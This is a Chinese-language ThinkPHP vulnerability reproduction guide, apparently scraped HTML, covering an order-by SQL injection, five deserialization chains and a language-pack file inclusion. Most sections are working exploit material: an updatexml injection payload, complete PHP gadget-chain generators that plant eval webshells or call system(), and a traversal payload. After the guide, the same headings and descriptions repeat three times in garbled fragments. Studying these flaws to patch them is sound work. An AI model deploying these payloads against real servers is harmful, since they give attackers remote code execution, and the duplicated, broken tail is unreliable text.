ThinkPHP 漏洞分析与复现指南<\/h1>

目录<\/h2>

ThinkPHP 基础知识<\/a><\/li>
CVE-2018-16385 SQL注入漏洞<\/a><\/li>
CVE-2021-36564 反序列化漏洞<\/a><\/li>
CVE-2021-36567 反序列化漏洞<\/a><\/li>
CVE-2022-33107 反序列化漏洞<\/a><\/li>
CVE-2022-38352 反序列化漏洞<\/a><\/li>
CVE-2022-45982 反序列化漏洞<\/a><\/li>

CVE-2022-47945 文件包含漏洞<\/a><\/li> <\/ol>

ThinkPHP 基础知识<\/h2>

# 安装ThinkPHP 5.0<\/span>
<\/span><\/span>composer create-project topthink\/think=<\/span>5.0.* tp5 --prefer-dist
<\/span><\/span>
<\/span><\/span># 安装ThinkPHP 6.0<\/span>
<\/span><\/span>composer create-project topthink\/think=<\/span>6.0.x tp6.0.8
<\/span><\/span>
<\/span><\/span># 设置国内源<\/span>
<\/span><\/span>composer config -g repo.packagist composer https:\/\/mirrors.aliyun.com\/composer\/
<\/span><\/span><\/code><\/pre>目录结构<\/h3>

router.php<\/code>：用于PHP自带webserver支持，可用于快速测试<\/li>
启动命令：php -S localhost:8888 router.php<\/code><\/li>
开启调试：

config.php<\/code>中设置app_debug<\/code>为true<\/code><\/li>
或在项目根目录创建.env<\/code>文件：app_debug = true<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
URL路由访问规则<\/h3>

普通模式<\/strong>：
http:\/\/serverName\/index.php?s=\/模块\/控制器\/操作\/[参数名\/参数值...]
<\/code><\/pre>
<\/li>
混合模式<\/strong>(默认)：
'url_route_on'<\/span>=><\/span>true<\/span>,
<\/span><\/span>'url_route_must'<\/span>=><\/span>false<\/span>
<\/span><\/span><\/code><\/pre><\/li>
强制模式<\/strong>：
'url_route_on'<\/span>=><\/span>true<\/span>,
<\/span><\/span>'url_route_must'<\/span>=><\/span>true<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
自定义路由<\/h3>
在application\/route.php<\/code>中注册：<\/p>
use<\/span> think\Route<\/span>;
<\/span><\/span>Route<\/span>::<\/span>rule<\/span>('路由表达式'<\/span>,'路由地址'<\/span>,'请求类型'<\/span>,'路由参数(数组)'<\/span>,'变量规则(数组)'<\/span>);
<\/span><\/span><\/code><\/pre>CVE-2018-16385 SQL注入漏洞<\/h2>
影响范围<\/h3>
ThinkPHP < 5.1.23<\/p>
漏洞描述<\/h3>
在处理order by<\/code>后的参数时，未正确过滤处理数组的key值，导致SQL注入。<\/p>
复现步骤<\/h3>


安装ThinkPHP 5.1.22：<\/p>
git clone https:\/\/github.com\/top-think\/think.git
<\/span><\/span>git checkout v5.1.22
<\/span><\/span>composer install
<\/span><\/span><\/code><\/pre><\/li>

创建测试控制器：<\/p>
public<\/span> function<\/span> sql<\/span>(){
<\/span><\/span>    $data =<\/span> array<\/span>();
<\/span><\/span>    $data['id'<\/span>] =<\/span> array<\/span>('eq'<\/span>, 'test'<\/span>);
<\/span><\/span>    $order =<\/span> $_GET['order'<\/span>];
<\/span><\/span>    $m =<\/span> db<\/span>('user'<\/span>)-><\/span>where<\/span>($data)-><\/span>order<\/span>($order)-><\/span>find<\/span>();
<\/span><\/span>    dump<\/span>($m);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

利用Payload：<\/p>
?order[id`,111)|updatexml(1,concat(0x3a,user()),1)#]=1
<\/code><\/pre>
<\/li>
<\/ol>
漏洞分析<\/h3>

漏洞位于thinkphp\/library\/think\/db\/Builder.php<\/code>的parseOrder()<\/code>函数<\/li>
field()<\/code>函数必须指定≥2个字段才能正常运行<\/li>
第一个字段会被添加反引号，必须为有效字段名<\/li>
<\/ul>
CVE-2021-36564 反序列化漏洞<\/h2>
影响范围<\/h3>
ThinkPHP < 6.0.9<\/p>
漏洞描述<\/h3>
通过vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php<\/code>实现反序列化漏洞。<\/p>
PoC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> League\Flysystem\Adapter<\/span>;
<\/span><\/span>class<\/span> Local<\/span> {}
<\/span><\/span>
<\/span><\/span>namespace<\/span> League\Flysystem\Cached\Storage<\/span>;
<\/span><\/span>use<\/span> League\Flysystem\Adapter\Local<\/span>;
<\/span><\/span>abstract<\/span> class<\/span> AbstractCache<\/span> {
<\/span><\/span>    protected<\/span> $autosave;
<\/span><\/span>    protected<\/span> $cache =<\/span> [];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Adapter<\/span> extends<\/span> AbstractCache<\/span> {
<\/span><\/span>    protected<\/span> $adapter;
<\/span><\/span>    protected<\/span> $file;
<\/span><\/span>    function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>autosave<\/span> =<\/span> false<\/span>;
<\/span><\/span>        $this-><\/span>adapter<\/span> =<\/span> new<\/span> Local<\/span>();
<\/span><\/span>        $this-><\/span>file<\/span> =<\/span> 'shell.php'<\/span>;
<\/span><\/span>        $this-><\/span>cache<\/span> =<\/span> ['shell'<\/span> =><\/span> '<?php eval($_GET[1]);?>'<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$o =<\/span> new<\/span> Adapter<\/span>();
<\/span><\/span>echo<\/span> urlencode<\/span>(serialize<\/span>($o));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

入口点：AbstractCache::__destruct()<\/code><\/li>
调用Adapter::save()<\/code><\/li>
通过getForStorage()<\/code>获取写入内容<\/li>
调用Local::write()<\/code>实现文件写入<\/li>
<\/ol>
CVE-2021-36567 反序列化漏洞<\/h2>
影响范围<\/h3>
ThinkPHP <= 6.0.8 (Linux系统)<\/p>
漏洞描述<\/h3>
通过League\Flysystem\Cached\Storage\AbstractCache<\/code>实现反序列化漏洞，可执行系统命令。<\/p>
PoC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> League\Flysystem\Cached\Storage<\/span>{
<\/span><\/span>    abstract<\/span> class<\/span> AbstractCache<\/span> {
<\/span><\/span>        protected<\/span> $autosave =<\/span> false<\/span>;
<\/span><\/span>        protected<\/span> $complete =<\/span> [];
<\/span><\/span>        protected<\/span> $cache =<\/span> ['`echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+|base64 -d > 2.php`'<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\filesystem<\/span>{
<\/span><\/span>    use<\/span> League\Flysystem\Cached\Storage\AbstractCache<\/span>;
<\/span><\/span>    class<\/span> CacheStore<\/span> extends<\/span> AbstractCache<\/span> {
<\/span><\/span>        protected<\/span> $store;
<\/span><\/span>        protected<\/span> $key;
<\/span><\/span>        public<\/span> function<\/span> __construct($store, $key, $expire){
<\/span><\/span>            $this-><\/span>key<\/span> =<\/span> $key;
<\/span><\/span>            $this-><\/span>store<\/span> =<\/span> $store;
<\/span><\/span>            $this-><\/span>expire<\/span> =<\/span> $expire;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\cache<\/span>{
<\/span><\/span>    abstract<\/span> class<\/span> Driver<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\cache\driver<\/span>{
<\/span><\/span>    use<\/span> think\cache\Driver<\/span>;
<\/span><\/span>    class<\/span> File<\/span> extends<\/span> Driver<\/span> {
<\/span><\/span>        protected<\/span> $options =<\/span> [
<\/span><\/span>            'expire'<\/span> =><\/span> 0<\/span>,
<\/span><\/span>            'cache_subdir'<\/span> =><\/span> false<\/span>,
<\/span><\/span>            'prefix'<\/span> =><\/span> false<\/span>,
<\/span><\/span>            'path'<\/span> =><\/span> 'y4tacker'<\/span>,
<\/span><\/span>            'hash_type'<\/span> =><\/span> 'md5'<\/span>,
<\/span><\/span>            'serialize'<\/span> =><\/span> ['system'<\/span>],
<\/span><\/span>        ];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    $b =<\/span> new<\/span> think\cache\driver\File<\/span>();
<\/span><\/span>    $a =<\/span> new<\/span> think\filesystem\CacheStore<\/span>($b, 'y4tacker'<\/span>, '1111'<\/span>);
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($a));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

通过AbstractCache::__destruct()<\/code>触发<\/li>
CacheStore::save()<\/code>调用getForStorage()<\/code><\/li>
返回[["<\/code>command"],[]]<\/code>格式数据<\/li>
File::set()<\/code>使用system<\/code>函数执行命令<\/li>
<\/ol>
CVE-2022-33107 反序列化漏洞<\/h2>
影响范围<\/h3>
ThinkPHP <= 6.0.12<\/p>
PoC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> think\model\concern<\/span>{
<\/span><\/span>    trait<\/span> Attribute<\/span> {
<\/span><\/span>        private<\/span> $data =<\/span> ['huahua'<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\view\driver<\/span>{
<\/span><\/span>    class<\/span> Php<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\session\driver<\/span>{
<\/span><\/span>    class<\/span> File<\/span> { }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> League\Flysystem<\/span>{
<\/span><\/span>    class<\/span> File<\/span> {
<\/span><\/span>        protected<\/span> $path;
<\/span><\/span>        protected<\/span> $filesystem;
<\/span><\/span>        public<\/span> function<\/span> __construct($File){
<\/span><\/span>            $this-><\/span>path<\/span> =<\/span> 'shell.php'<\/span>;
<\/span><\/span>            $this-><\/span>filesystem<\/span> =<\/span> $File;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\console<\/span>{
<\/span><\/span>    use<\/span> League\Flysystem\File<\/span>;
<\/span><\/span>    class<\/span> Output<\/span> {
<\/span><\/span>        protected<\/span> $styles =<\/span> [];
<\/span><\/span>        private<\/span> $handle;
<\/span><\/span>        public<\/span> function<\/span> __construct($File){
<\/span><\/span>            $this-><\/span>styles<\/span>[] =<\/span> 'getDomainBind'<\/span>;
<\/span><\/span>            $this-><\/span>handle<\/span> =<\/span> new<\/span> File<\/span>($File);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think<\/span>{
<\/span><\/span>    abstract<\/span> class<\/span> Model<\/span> {
<\/span><\/span>        use<\/span> model\concern\Attribute<\/span>;
<\/span><\/span>        private<\/span> $lazySave;
<\/span><\/span>        protected<\/span> $withEvent;
<\/span><\/span>        protected<\/span> $table;
<\/span><\/span>        function<\/span> __construct($cmd, $File){
<\/span><\/span>            $this-><\/span>lazySave<\/span> =<\/span> true<\/span>;
<\/span><\/span>            $this-><\/span>withEvent<\/span> =<\/span> false<\/span>;
<\/span><\/span>            $this-><\/span>table<\/span> =<\/span> new<\/span> route\Url<\/span>(new<\/span> Middleware<\/span>, new<\/span> console\Output<\/span>($File), $cmd);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    class<\/span> Middleware<\/span> {
<\/span><\/span>        public<\/span> $request =<\/span> 2333<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model<\/span>{
<\/span><\/span>    use<\/span> think\Model<\/span>;
<\/span><\/span>    class<\/span> Pivot<\/span> extends<\/span> Model<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\route<\/span>{
<\/span><\/span>    class<\/span> Url<\/span> {
<\/span><\/span>        protected<\/span> $url =<\/span> 'a:'<\/span>;
<\/span><\/span>        protected<\/span> $domain;
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        protected<\/span> $route;
<\/span><\/span>        function<\/span> __construct($app, $route, $cmd){
<\/span><\/span>            $this-><\/span>domain<\/span> =<\/span> $cmd;
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> $app;
<\/span><\/span>            $this-><\/span>route<\/span> =<\/span> $route;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    $zoe =<\/span> '<?= phpinfo(); exit();\/\/'<\/span>;
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>(new<\/span> think\Model\Pivot<\/span>($zoe, new<\/span> think\session\driver\File<\/span>)));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

入口点：Model::__destruct()<\/code><\/li>
通过table<\/code>属性触发Url::__toString()<\/code><\/li>
调用Output::__call()<\/code> -> block()<\/code> -> writeln()<\/code> -> write()<\/code><\/li>
最终调用File::write()<\/code>写入Webshell<\/li>
<\/ol>
CVE-2022-38352 反序列化漏洞<\/h2>
影响范围<\/h3>
ThinkPHP <= 6.0.13<\/p>
PoC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> League\Flysystem\Cached\Storage<\/span>{
<\/span><\/span>    class<\/span> Psr6Cache<\/span> {
<\/span><\/span>        private<\/span> $pool;
<\/span><\/span>        protected<\/span> $autosave =<\/span> false<\/span>;
<\/span><\/span>        public<\/span> function<\/span> __construct($exp){
<\/span><\/span>            $this-><\/span>pool<\/span> =<\/span> $exp;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\log<\/span>{
<\/span><\/span>    class<\/span> Channel<\/span> {
<\/span><\/span>        protected<\/span> $logger;
<\/span><\/span>        protected<\/span> $lazy =<\/span> true<\/span>;
<\/span><\/span>        public<\/span> function<\/span> __construct($exp){
<\/span><\/span>            $this-><\/span>logger<\/span> =<\/span> $exp;
<\/span><\/span>            $this-><\/span>lazy<\/span> =<\/span> false<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think<\/span>{
<\/span><\/span>    class<\/span> Request<\/span> {
<\/span><\/span>        protected<\/span> $url;
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>url<\/span> =<\/span> '<?php system(\'calc\'); exit(); ?>'<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    class<\/span> App<\/span> {
<\/span><\/span>        protected<\/span> $instances =<\/span> [];
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>instances<\/span> =<\/span> ['think\Request'<\/span> =><\/span> new<\/span> Request<\/span>()];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\view\driver<\/span>{
<\/span><\/span>    class<\/span> Php<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\log\driver<\/span>{
<\/span><\/span>    class<\/span> Socket<\/span> {
<\/span><\/span>        protected<\/span> $config =<\/span> [];
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>config<\/span> =<\/span> [
<\/span><\/span>                'debug'<\/span> =><\/span> true<\/span>,
<\/span><\/span>                'force_client_ids'<\/span> =><\/span> 1<\/span>,
<\/span><\/span>                'allow_client_ids'<\/span> =><\/span> ''<\/span>,
<\/span><\/span>                'format_head'<\/span> =><\/span> [new<\/span> \think\view\driver\Php<\/span>, 'display'<\/span>],
<\/span><\/span>            ];
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> new<\/span> \think\App<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    $c =<\/span> new<\/span> think\log\driver\Socket<\/span>();
<\/span><\/span>    $b =<\/span> new<\/span> think\log\Channel<\/span>($c);
<\/span><\/span>    $a =<\/span> new<\/span> League\Flysystem\Cached\Storage\Psr6Cache<\/span>($b);
<\/span><\/span>    echo<\/span> urlencode<\/span>(base64_encode<\/span>(serialize<\/span>($a)));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

入口点：Psr6Cache::__destruct()<\/code><\/li>
调用Channel::__call()<\/code> -> record()<\/code><\/li>
调用Socket::save()<\/code><\/li>
通过format_head<\/code>调用Php::display()<\/code>实现RCE<\/li>
<\/ol>
CVE-2022-45982 反序列化漏洞<\/h2>
影响范围<\/h3>
ThinkPHP 6.0.0~6.0.13 和6.1.0~6.1.1<\/p>
PoC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> think<\/span>{
<\/span><\/span>    abstract<\/span> class<\/span> Model<\/span> {
<\/span><\/span>        private<\/span> $lazySave =<\/span> true<\/span>;
<\/span><\/span>        private<\/span> $data =<\/span> ['a'<\/span> =><\/span> 'b'<\/span>];
<\/span><\/span>        private<\/span> $exists =<\/span> true<\/span>;
<\/span><\/span>        protected<\/span> $withEvent =<\/span> false<\/span>;
<\/span><\/span>        protected<\/span> $readonly =<\/span> ['a'<\/span>];
<\/span><\/span>        protected<\/span> $relationWrite;
<\/span><\/span>        private<\/span> $relation;
<\/span><\/span>        private<\/span> $origin =<\/span> [];
<\/span><\/span>        public<\/span> function<\/span> __construct($value) {
<\/span><\/span>            $this-><\/span>relation<\/span> =<\/span> ['r'<\/span> =><\/span> $this];
<\/span><\/span>            $this-><\/span>origin<\/span> =<\/span> ["n"<\/span> =><\/span> $value];
<\/span><\/span>            $this-><\/span>relationWrite<\/span> =<\/span> ['r'<\/span> =><\/span> ["n"<\/span> =><\/span> $value]];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    class<\/span> App<\/span> {
<\/span><\/span>        protected<\/span> $request;
<\/span><\/span>    }
<\/span><\/span>    class<\/span> Request<\/span> {
<\/span><\/span>        protected<\/span> $mergeParam =<\/span> true<\/span>;
<\/span><\/span>        protected<\/span> $param =<\/span> ["whoami"<\/span>];
<\/span><\/span>        protected<\/span> $filter =<\/span> "system"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model<\/span>{
<\/span><\/span>    use<\/span> think\Model<\/span>;
<\/span><\/span>    class<\/span> Pivot<\/span> extends<\/span> Model<\/span> { }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\route<\/span>{
<\/span><\/span>    use<\/span> think\App<\/span>;
<\/span><\/span>    class<\/span> Url<\/span> {
<\/span><\/span>        protected<\/span> $url =<\/span> ""<\/span>;
<\/span><\/span>        protected<\/span> $domain =<\/span> "domain"<\/span>;
<\/span><\/span>        protected<\/span> $route;
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        public<\/span> function<\/span> __construct($route) {
<\/span><\/span>            $this-><\/span>route<\/span> =<\/span> $route;
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> new<\/span> App<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\log<\/span>{
<\/span><\/span>    class<\/span> Channel<\/span> {
<\/span><\/span>        protected<\/span> $lazy =<\/span> false<\/span>;
<\/span><\/span>        protected<\/span> $logger;
<\/span><\/span>        protected<\/span> $log =<\/span> [];
<\/span><\/span>        public<\/span> function<\/span> __construct($logger) {
<\/span><\/span>            $this-><\/span>logger<\/span> =<\/span> $logger;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\session<\/span>{
<\/span><\/span>    class<\/span> Store<\/span> {
<\/span><\/span>        protected<\/span> $data;
<\/span><\/span>        protected<\/span> $serialize =<\/span> ["call_user_func"<\/span>];
<\/span><\/span>        protected<\/span> $id =<\/span> ""<\/span>;
<\/span><\/span>        public<\/span> function<\/span> __construct($data) {
<\/span><\/span>            $this-><\/span>data<\/span> =<\/span> [$data, "param"<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    $request =<\/span> new<\/span> think\Request<\/span>(); \/\/ param
<\/span><\/span><\/span><\/span>    $store =<\/span> new<\/span> think\session\Store<\/span>($request); \/\/ save
<\/span><\/span><\/span><\/span>    $channel =<\/span> new<\/span> think\log\Channel<\/span>($store); \/\/ __call
<\/span><\/span><\/span><\/span>    $url =<\/span> new<\/span> think\route\Url<\/span>($channel); \/\/ __toString
<\/span><\/span><\/span><\/span>    $model =<\/span> new<\/span> think\model\Pivot<\/span>($url); \/\/ __destruct
<\/span><\/span><\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($model));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

入口点：Model::__destruct()<\/code><\/li>
通过relationWrite<\/code>触发Url::__toString()<\/code><\/li>
调用Channel::__call()<\/code> -> record()<\/code><\/li>
调用Store::save()<\/code>使用call_user_func<\/code>执行命令<\/li>
<\/ol>
CVE-2022-47945 文件包含漏洞<\/h2>
影响范围<\/h3>
ThinkPHP <= 6.0.13 (需开启多语言功能)<\/p>
漏洞描述<\/h3>
通过get、header、cookie等位置传入参数，实现目录穿越+文件包含。<\/p>
复现步骤<\/h3>


安装ThinkPHP 6.0.12：<\/p>
composer create-project topthink\/think=<\/span>6.0.12 tp6
<\/span><\/span><\/code><\/pre><\/li>

修改app\/middleware.php<\/code>启用多语言：<\/p>
return<\/span> [
<\/span><\/span>    \think\middleware\LoadLangPack<\/span>::<\/span>class<\/span>,
<\/span><\/span>];
<\/span><\/span><\/code><\/pre><\/li>

利用Payload：<\/p>
http:\/\/localhost\/public?lang=public\/test
<\/code><\/pre>
<\/li>
<\/ol>
漏洞分析<\/h3>

LoadLangPack<\/code>中间件检测lang<\/code>参数<\/li>
通过detect()<\/code>函数获取语言设置<\/li>
load()<\/code>函数包含指定文件路径<\/li>
最终通过parse()<\/code>函数实现文件包含<\/li>
<\/ol>
总结<\/h2>
本指南详细分析了ThinkPHP多个版本的漏洞原理和复现方法，包括：<\/p>

SQL注入漏洞<\/li>
反序列化漏洞(多种利用链)<\/li>
文件包含漏洞<\/li>
<\/ul>
在实际测试中，需要注意：<\/p>

准确识别目标ThinkPHP版本<\/li>
根据版本选择合适的漏洞利用方式<\/li>
注意环境配置要求(如多语言功能是否开启)<\/li>
反序列化漏洞通常需要找到合适的触发点<\/li>
<\/ol>
建议开发人员及时升级到最新版本，并关闭不必要的功能模块。<\/p>

ThinkPHP 漏洞分析与复现指南<\/h1>

ThinkPHP 基础知识<\/h2>

CVE-2018-16385 SQL注入漏洞<\/h2>

影响范围<\/h3>
ThinkPHP < 5.1.23<\/p>

漏洞描述<\/h3>
在处理`order by<\/code>后的参数时，未正确过滤处理数组的key值，导致SQL注入。<\/p>`

CVE-2021-36564 反序列化漏洞<\/h2>

影响范围<\/h3>
ThinkPHP < 6.0.9<\/p>

漏洞描述<\/h3>
通过`vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php<\/code>实现反序列化漏洞。<\/p>`

CVE-2021-36567 反序列化漏洞<\/h2>

影响范围<\/h3>
ThinkPHP <= 6.0.8 (Linux系统)<\/p>

漏洞描述<\/h3>
通过`League\Flysystem\Cached\Storage\AbstractCache<\/code>实现反序列化漏洞，可执行系统命令。<\/p>`

CVE-2022-33107 反序列化漏洞<\/h2>

影响范围<\/h3>
ThinkPHP <= 6.0.12<\/p>

CVE-2022-38352 反序列化漏洞<\/h2>

影响范围<\/h3>
ThinkPHP <= 6.0.13<\/p>

CVE-2022-45982 反序列化漏洞<\/h2>

影响范围<\/h3>
ThinkPHP 6.0.0~6.0.13 和6.1.0~6.1.1<\/p>

CVE-2022-47945 文件包含漏洞<\/h2>

影响范围<\/h3>
ThinkPHP <= 6.0.13 (需开启多语言功能)<\/p>

漏洞描述<\/h3>
通过get、header、cookie等位置传入参数，实现目录穿越+文件包含。<\/p>

ThinkPHP 漏洞分析与复现指南<\/h1>

ThinkPHP 基础知识<\/h2>

CVE-2018-16385 SQL注入漏洞<\/h2>

影响范围<\/h3> ThinkPHP < 5.1.23<\/p>

漏洞描述<\/h3> 在处理order by<\/code>后的参数时，未正确过滤处理数组的key值，导致SQL注入。<\/p>

CVE-2021-36564 反序列化漏洞<\/h2>

影响范围<\/h3> ThinkPHP < 6.0.9<\/p>

漏洞描述<\/h3> 通过vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php<\/code>实现反序列化漏洞。<\/p>

CVE-2021-36567 反序列化漏洞<\/h2>

影响范围<\/h3> ThinkPHP <= 6.0.8 (Linux系统)<\/p>

漏洞描述<\/h3> 通过League\Flysystem\Cached\Storage\AbstractCache<\/code>实现反序列化漏洞，可执行系统命令。<\/p>

CVE-2022-33107 反序列化漏洞<\/h2>

影响范围<\/h3> ThinkPHP <= 6.0.12<\/p>

CVE-2022-38352 反序列化漏洞<\/h2>

影响范围<\/h3> ThinkPHP <= 6.0.13<\/p>

CVE-2022-45982 反序列化漏洞<\/h2>

影响范围<\/h3> ThinkPHP 6.0.0~6.0.13 和6.1.0~6.1.1<\/p>

CVE-2022-47945 文件包含漏洞<\/h2>

影响范围<\/h3> ThinkPHP <= 6.0.13 (需开启多语言功能)<\/p>

漏洞描述<\/h3> 通过get、header、cookie等位置传入参数，实现目录穿越+文件包含。<\/p>

影响范围<\/h3>
ThinkPHP < 5.1.23<\/p>

漏洞描述<\/h3>
在处理`order by<\/code>后的参数时，未正确过滤处理数组的key值，导致SQL注入。<\/p>`

影响范围<\/h3>
ThinkPHP < 6.0.9<\/p>

漏洞描述<\/h3>
通过`vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php<\/code>实现反序列化漏洞。<\/p>`

影响范围<\/h3>
ThinkPHP <= 6.0.8 (Linux系统)<\/p>

漏洞描述<\/h3>
通过`League\Flysystem\Cached\Storage\AbstractCache<\/code>实现反序列化漏洞，可执行系统命令。<\/p>`

影响范围<\/h3>
ThinkPHP <= 6.0.12<\/p>

影响范围<\/h3>
ThinkPHP <= 6.0.13<\/p>

影响范围<\/h3>
ThinkPHP 6.0.0~6.0.13 和6.1.0~6.1.1<\/p>

影响范围<\/h3>
ThinkPHP <= 6.0.13 (需开启多语言功能)<\/p>

漏洞描述<\/h3>
通过get、header、cookie等位置传入参数，实现目录穿越+文件包含。<\/p>